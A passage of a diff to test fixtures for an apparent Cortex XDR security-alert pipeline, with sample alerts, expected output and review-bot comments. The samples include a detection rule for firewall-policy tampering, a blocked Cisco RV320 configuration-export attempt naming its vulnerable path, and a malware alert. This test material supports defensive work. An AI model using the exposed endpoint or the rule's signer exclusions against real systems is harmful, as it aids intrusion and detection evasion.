name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"*system\\\\*\\\\services\\\\sharedaccess\\\\parameters\\\\firewallpolicy\\\\*\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"data\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"0\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"value 
name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"donotallowexceptions\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"enablefirewall\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"Process\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"svchost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"dllhost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"mmc.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"sihost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo 
name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"svchost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"dllhost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"mmc.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"sihost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"signature\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"Signed\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Unsigned\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"N/A\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Invalid 
Signature\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Weak Hash\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo signature\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Signed\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Unsigned\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"N/A\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Invalid Signature\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Weak Hash\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"signer\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"Symantec 
Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"CyberArk Software Ltd.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"McAfee, Inc.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Kaspersky Lab\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Avira Operations GmbH \u0026 Co. KG\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"F-Secure Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo signer\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Symantec Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"CyberArk Software Ltd.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"McAfee, 
Inc.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Kaspersky Lab\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Avira Operations GmbH \u0026 Co. KG\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"F-Secure Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"IBM Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"IBM Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Host\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"host os\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_agent\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_agent\"},{\"pretty_name\":\"windows\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_agent\"}],\"host_ip\":[\"192.168.88.1\",\"192.168.153.1\",\"10.10.10.10\"],\"host_name\":\"testhostname-123\",\"mac_addresses\":null,\"source\":\"XDR BIOC\",\"action\":\"DETECTED\",\"action_pretty\":\"Detected\"}", "kind": "alert", "created": "2020-05-06T19:15:14.182Z", 
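Review bot: The only line this hunk changes is `event.ingested`, a wall-clock value stamped when the expected file was regenerated, so this fixture will keep churning on every regeneration without exercising anything in the pipeline. If the pipeline test runner supports it, declaring `event.ingested` as a dynamic field in the data stream's pipeline test config (e.g. `dynamic_fields: event.ingested: ".*"`) and dropping the literal value from the expected file would make future fixture diffs show only genuine output changes. The test config is not visible from this hunk, so this is a suggestion to verify against the tooling in use.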
diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log index c6f4a9ba962..b10c546d4b6 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log +++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log 
@@ -1,2 +1,2 @@ -{"external_id":"396239671","severity":"high","matching_status":"UNMATCHABLE","end_match_attempt_ts":null,"local_insert_ts":1626347122923,"bioc_indicator":null,"matching_service_rule_id":null,"attempt_counter":null,"bioc_category_enum_key":null,"is_whitelisted":false,"starred":false,"deduplicate_tokens":"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15","filter_rule_id":null,"mitre_technique_id_and_name":null,"mitre_tactic_id_and_name":null,"agent_version":null,"agent_device_domain":null,"agent_fqdn":null,"agent_os_type":"NO_HOST","agent_os_sub_type":null,"agent_data_collection_status":null,"mac":"4c:ae:a3:8e:c8:6a","events":{"agent_install_type":"NA","agent_host_boot_time":null,"event_sub_type":null,"module_id":null,"association_strength":10,"dst_association_strength":10,"story_id":"MzYzOTQ0MDE1MDI4OTE3NDUyNA==","event_id":"MzYzOTQ0MDE1MDI4OTE3NDUyNA==","event_type":"Network Connections","event_timestamp":1626346867000,"actor_process_instance_id":null,"actor_process_image_path":null,"actor_process_image_name":null,"actor_process_command_line":null,"actor_process_signature_status":"N/A","actor_process_signature_vendor":null,"actor_process_image_sha256":null,"actor_process_image_md5":null,"actor_process_causality_id":null,"actor_causality_id":null,"actor_process_os_pid":null,"actor_thread_thread_id":null,"causality_actor_process_image_name":null,"causality_actor_process_command_line":null,"causality_actor_process_image_path":null,"causality_actor_process_signature_vendor":null,"causality_actor_process_signature_status":"N/A","causality_actor_causality_id":null,"causality_actor_process_execution_time":null,"causality_actor_process_image_md5":null,"causality_actor_process_image_sha256":null,"action_file_path":null,"action_file_name":null,"action_file_md5":null,"action_file_sha256":null,"action_file_macro_sha256":null,"action_registry_data":null,"action_registry_key_name":null,"action_registry_value_name":null,"action_registry_full_key":
null,"action_local_ip":"10.10.10.10","action_local_port":58642,"action_remote_ip":"8.8.8.8","action_remote_port":443,"action_external_hostname":"8.8.8.8","action_country":"DK","action_process_instance_id":null,"action_process_causality_id":null,"action_process_image_name":null,"action_process_image_sha256":null,"action_process_image_command_line":null,"action_process_signature_status":"N/A","action_process_signature_vendor":null,"os_actor_effective_username":null,"os_actor_process_instance_id":null,"os_actor_process_image_path":null,"os_actor_process_image_name":null,"os_actor_process_command_line":null,"os_actor_process_signature_status":"N/A","os_actor_process_signature_vendor":null,"os_actor_process_image_sha256":null,"os_actor_process_causality_id":null,"os_actor_causality_id":null,"os_actor_process_os_pid":null,"os_actor_thread_thread_id":null,"fw_app_id":"web-browsing","fw_interface_from":"INTERNET","fw_interface_to":"INTERNET","fw_rule":"INTERNET_INTERNET_GlobalProtect-443","fw_rule_id":null,"fw_device_name":"FW-DEVICE_NAME","fw_serial_number":"12352345","fw_url_domain":"9.9.9.9","fw_email_subject":null,"fw_email_sender":null,"fw_email_recipient":null,"fw_app_subcategory":"internet-utility","fw_app_category":"general-internet","fw_app_technology":"browser-based","fw_vsys":"vsys1","fw_xff":null,"fw_misc":"7.7.7.7/cgi-bin/config.exp","fw_is_phishing":"No","dst_agent_id":"6.6.6.6","dst_causality_actor_process_execution_time":null,"dns_query_name":null,"dst_action_external_hostname":null,"dst_action_country":"US","dst_action_external_port":null,"contains_featured_host":"NO","contains_featured_user":"NO","contains_featured_ip":"NO","image_name":null,"container_id":null,"cluster_name":null,"user_name":null},"alert_id":"2879211","detection_timestamp":1626346849000,"name":"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability","category":"Vulnerability","endpoint_id":"192.168.2.2","description":"Info-Leak 
(7.7.7.7/cgi-bin/config.exp)","host_ip":["192.168.2.2"],"host_name":null,"mac_addresses":["ab:ae:f5:sd:c8:6a"],"source":"PAN NGFW","action":"BLOCKED_9","action_pretty":"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)"} +{"external_id":"396239671","severity":"high","matching_status":"UNMATCHABLE","end_match_attempt_ts":null,"local_insert_ts":1626347122923,"bioc_indicator":null,"matching_service_rule_id":null,"attempt_counter":null,"bioc_category_enum_key":null,"is_whitelisted":false,"starred":false,"deduplicate_tokens":"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15","filter_rule_id":null,"mitre_technique_id_and_name":null,"mitre_tactic_id_and_name":null,"agent_version":null,"agent_device_domain":null,"agent_fqdn":null,"agent_os_type":"NO_HOST","agent_os_sub_type":null,"agent_data_collection_status":null,"mac":"4c:ae:a3:8e:c8:6a","events":{"agent_install_type":"NA","agent_host_boot_time":null,"event_sub_type":null,"module_id":null,"association_strength":10,"dst_association_strength":10,"story_id":"MzYzOTQ0MDE1MDI4OTE3NDUyNA==","event_id":"MzYzOTQ0MDE1MDI4OTE3NDUyNA==","event_type":"Network 
Connections","event_timestamp":1626346867000,"actor_process_instance_id":null,"actor_process_image_path":null,"actor_process_image_name":null,"actor_process_command_line":null,"actor_process_signature_status":"N/A","actor_process_signature_vendor":null,"actor_process_image_sha256":null,"actor_process_image_md5":null,"actor_process_causality_id":null,"actor_causality_id":null,"actor_process_os_pid":null,"actor_thread_thread_id":null,"causality_actor_process_image_name":null,"causality_actor_process_command_line":null,"causality_actor_process_image_path":null,"causality_actor_process_signature_vendor":null,"causality_actor_process_signature_status":"N/A","causality_actor_causality_id":null,"causality_actor_process_execution_time":null,"causality_actor_process_image_md5":null,"causality_actor_process_image_sha256":null,"action_file_path":null,"action_file_name":null,"action_file_md5":null,"action_file_sha256":null,"action_file_macro_sha256":null,"action_registry_data":null,"action_registry_key_name":null,"action_registry_value_name":null,"action_registry_full_key":null,"action_local_ip":"10.10.10.10","action_local_port":58642,"action_remote_ip":"175.16.199.1","action_remote_port":443,"action_external_hostname":"175.16.199.1","action_country":"DK","action_process_instance_id":null,"action_process_causality_id":null,"action_process_image_name":null,"action_process_image_sha256":null,"action_process_image_command_line":null,"action_process_signature_status":"N/A","action_process_signature_vendor":null,"os_actor_effective_username":null,"os_actor_process_instance_id":null,"os_actor_process_image_path":null,"os_actor_process_image_name":null,"os_actor_process_command_line":null,"os_actor_process_signature_status":"N/A","os_actor_process_signature_vendor":null,"os_actor_process_image_sha256":null,"os_actor_process_causality_id":null,"os_actor_causality_id":null,"os_actor_process_os_pid":null,"os_actor_thread_thread_id":null,"fw_app_id":"web-browsing","fw_interface_from":"INT
ERNET","fw_interface_to":"INTERNET","fw_rule":"INTERNET_INTERNET_GlobalProtect-443","fw_rule_id":null,"fw_device_name":"FW-DEVICE_NAME","fw_serial_number":"12352345","fw_url_domain":"9.9.9.9","fw_email_subject":null,"fw_email_sender":null,"fw_email_recipient":null,"fw_app_subcategory":"internet-utility","fw_app_category":"general-internet","fw_app_technology":"browser-based","fw_vsys":"vsys1","fw_xff":null,"fw_misc":"7.7.7.7/cgi-bin/config.exp","fw_is_phishing":"No","dst_agent_id":"6.6.6.6","dst_causality_actor_process_execution_time":null,"dns_query_name":null,"dst_action_external_hostname":null,"dst_action_country":"US","dst_action_external_port":null,"contains_featured_host":"NO","contains_featured_user":"NO","contains_featured_ip":"NO","image_name":null,"container_id":null,"cluster_name":null,"user_name":null},"alert_id":"2879211","detection_timestamp":1626346849000,"name":"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability","category":"Vulnerability","endpoint_id":"192.168.2.2","description":"Info-Leak (7.7.7.7/cgi-bin/config.exp)","host_ip":["192.168.2.2"],"host_name":null,"mac_addresses":["ab:ae:f5:sd:c8:6a"],"source":"PAN NGFW","action":"BLOCKED_9","action_pretty":"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)"} 
{"external_id":"803fd786a6ba49c1bb642e3ba91a93c7","severity":"medium","matching_status":"MATCHED","end_match_attempt_ts":1582275027631,"local_insert_ts":1582274996871,"bioc_indicator":null,"matching_service_rule_id":null,"attempt_counter":1,"bioc_category_enum_key":null,"is_whitelisted":false,"starred":false,"deduplicate_tokens":null,"filter_rule_id":null,"mitre_technique_id_and_name":null,"mitre_tactic_id_and_name":null,"agent_version":null,"agent_device_domain":null,"agent_fqdn":null,"agent_os_type":"Windows","agent_os_sub_type":null,"agent_data_collection_status":true,"mac":null,"events":{"agent_install_type":"STANDARD","agent_host_boot_time":null,"event_sub_type":null,"module_id":null,"association_strength":null,"dst_association_strength":null,"story_id":null,"event_id":null,"event_type":"Process Execution","event_timestamp":1582274179588,"actor_process_instance_id":"AdXokfzvxXMAAEB8AAAAAA==","actor_process_image_path":"C:\\Users\\testuser\\Desktop\\unlocker-master\\gettools.exe","actor_process_image_name":"gettools.exe","actor_process_command_line":"gettools.exe","actor_process_signature_status":"Unsigned","actor_process_signature_vendor":"N/A","actor_process_image_sha256":"4FEAF3340B663CCE76EE09D7621E43C8A0A4C89C1DE4734E2EF2C903C29C366F","actor_process_image_md5":null,"actor_process_causality_id":"AdXokeompQUAAECsAAAAAA==","actor_causality_id":null,"actor_process_os_pid":16508,"actor_thread_thread_id":null,"causality_actor_process_image_name":"cmd.exe","causality_actor_process_command_line":"\"C:\\WINDOWS\\System32\\cmd.exe\" /C \"C:\\Users\\testuser\\Desktop\\unlocker-master\\win-install.cmd\" ","causality_actor_process_image_path":"C:\\Windows\\System32\\cmd.exe","causality_actor_process_signature_vendor":"Microsoft 
Corporation","causality_actor_process_signature_status":"Signed","causality_actor_causality_id":"AdXokeompQUAAECsAAAAAA==","causality_actor_process_execution_time":1582274147424,"causality_actor_process_image_md5":null,"causality_actor_process_image_sha256":"9a7c58bd98d70631aa1473f7b57b426db367d72429a5455b433a05ee251f3236","action_file_path":null,"action_file_name":null,"action_file_md5":null,"action_file_sha256":null,"action_file_macro_sha256":null,"action_registry_data":null,"action_registry_key_name":null,"action_registry_value_name":null,"action_registry_full_key":null,"action_local_ip":null,"action_local_port":null,"action_remote_ip":null,"action_remote_port":null,"action_external_hostname":null,"action_country":null,"action_process_instance_id":null,"action_process_causality_id":null,"action_process_image_name":null,"action_process_image_sha256":null,"action_process_image_command_line":null,"action_process_signature_status":"N/A","action_process_signature_vendor":"N/A","os_actor_effective_username":null,"os_actor_process_instance_id":null,"os_actor_process_image_path":null,"os_actor_process_image_name":null,"os_actor_process_command_line":null,"os_actor_process_signature_status":null,"os_actor_process_signature_vendor":null,"os_actor_process_image_sha256":null,"os_actor_process_causality_id":null,"os_actor_causality_id":null,"os_actor_process_os_pid":null,"os_actor_thread_thread_id":null,"fw_app_id":null,"fw_interface_from":null,"fw_interface_to":null,"fw_rule":null,"fw_rule_id":null,"fw_device_name":null,"fw_serial_number":null,"fw_url_domain":null,"fw_email_subject":null,"fw_email_sender":null,"fw_email_recipient":null,"fw_app_subcategory":null,"fw_app_category":null,"fw_app_technology":null,"fw_vsys":null,"fw_xff":null,"fw_misc":null,"fw_is_phishing":"N/A","dst_agent_id":null,"dst_causality_actor_process_execution_time":null,"dns_query_name":null,"dst_action_external_hostname":null,"dst_action_country":null,"dst_action_external_port":null,"contains_featured
_host":null,"contains_featured_user":null,"contains_featured_ip":null,"image_name":null,"container_id":null,"cluster_name":null,"user_name":null},"alert_id":"389045","detection_timestamp":1582274179588,"name":"WildFire Malware","category":"Malware","endpoint_id":"7e2caa3cfcba492ec3b7468356699991","description":"Suspicious executable detected","host_ip":["192.168.2.2"],"host_name":"test-hostname","mac_addresses":null,"source":"XDR Agent","action":"BLOCKED","action_pretty":"Prevented (Blocked)"} diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json index d841c58eda6..d00123405c3 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json +++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json @@ -28,7 +28,7 @@ "fw_url_domain": "9.9.9.9", "event_type": "Network Connections", "event_id": "MzYzOTQ0MDE1MDI4OTE3NDUyNA==", - "action_external_hostname": "8.8.8.8", + "action_external_hostname": "175.16.199.1", "fw_app_subcategory": "internet-utility", "os_actor_process_signature_status": "N/A", "agent_install_type": "NA", @@ -51,22 +51,24 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "rule": { "name": "INTERNET_INTERNET_GlobalProtect-443" 
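Review bot: The replacement in this record only touches `action_remote_ip` and `action_external_hostname`; the same event still carries the real public addresses `9.9.9.9` (`fw_url_domain`), `7.7.7.7` (`fw_misc` and `description`) and `6.6.6.6` (`dst_agent_id`), which contradicts the changelog's "supported subset" intent and leaves addresses allocated to unrelated third parties in a published fixture. Unless those fields are GeoIP-enriched by the pipeline (not visible here), RFC 5737 documentation addresses such as `203.0.113.7` would be a safer choice for the non-geo fields. Note also that `action_country` stays `"DK"` while the expected output now resolves the new destination to `CN`, so a reader of the fixture sees two conflicting countries for one connection; if `action_country` is passed through from vendor data, consider setting it to `"CN"` when regenerating. The malformed `mac_addresses` entry `ab:ae:f5:sd:c8:6a` (`sd` is not hex) is pre-existing but is re-committed on the new line and could be fixed in the same pass.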
@@ -111,8 +113,8 @@ "event": { "severity": 4, "reason": "Info-Leak (7.7.7.7/cgi-bin/config.exp)", - "ingested": "2021-10-14T10:31:16.914781604Z", - "original": "{\"external_id\":\"396239671\",\"severity\":\"high\",\"matching_status\":\"UNMATCHABLE\",\"end_match_attempt_ts\":null,\"local_insert_ts\":1626347122923,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":null,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":\"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15\",\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"NO_HOST\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":null,\"mac\":\"4c:ae:a3:8e:c8:6a\",\"events\":{\"agent_install_type\":\"NA\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":10,\"dst_association_strength\":10,\"story_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_type\":\"Network 
Connections\",\"event_timestamp\":1626346867000,\"actor_process_instance_id\":null,\"actor_process_image_path\":null,\"actor_process_image_name\":null,\"actor_process_command_line\":null,\"actor_process_signature_status\":\"N/A\",\"actor_process_signature_vendor\":null,\"actor_process_image_sha256\":null,\"actor_process_image_md5\":null,\"actor_process_causality_id\":null,\"actor_causality_id\":null,\"actor_process_os_pid\":null,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":null,\"causality_actor_process_command_line\":null,\"causality_actor_process_image_path\":null,\"causality_actor_process_signature_vendor\":null,\"causality_actor_process_signature_status\":\"N/A\",\"causality_actor_causality_id\":null,\"causality_actor_process_execution_time\":null,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":null,\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":\"10.10.10.10\",\"action_local_port\":58642,\"action_remote_ip\":\"8.8.8.8\",\"action_remote_port\":443,\"action_external_hostname\":\"8.8.8.8\",\"action_country\":\"DK\",\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":null,\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,
\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":\"web-browsing\",\"fw_interface_from\":\"INTERNET\",\"fw_interface_to\":\"INTERNET\",\"fw_rule\":\"INTERNET_INTERNET_GlobalProtect-443\",\"fw_rule_id\":null,\"fw_device_name\":\"FW-DEVICE_NAME\",\"fw_serial_number\":\"12352345\",\"fw_url_domain\":\"9.9.9.9\",\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":\"internet-utility\",\"fw_app_category\":\"general-internet\",\"fw_app_technology\":\"browser-based\",\"fw_vsys\":\"vsys1\",\"fw_xff\":null,\"fw_misc\":\"7.7.7.7/cgi-bin/config.exp\",\"fw_is_phishing\":\"No\",\"dst_agent_id\":\"6.6.6.6\",\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":\"US\",\"dst_action_external_port\":null,\"contains_featured_host\":\"NO\",\"contains_featured_user\":\"NO\",\"contains_featured_ip\":\"NO\",\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"2879211\",\"detection_timestamp\":1626346849000,\"name\":\"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability\",\"category\":\"Vulnerability\",\"endpoint_id\":\"192.168.2.2\",\"description\":\"Info-Leak 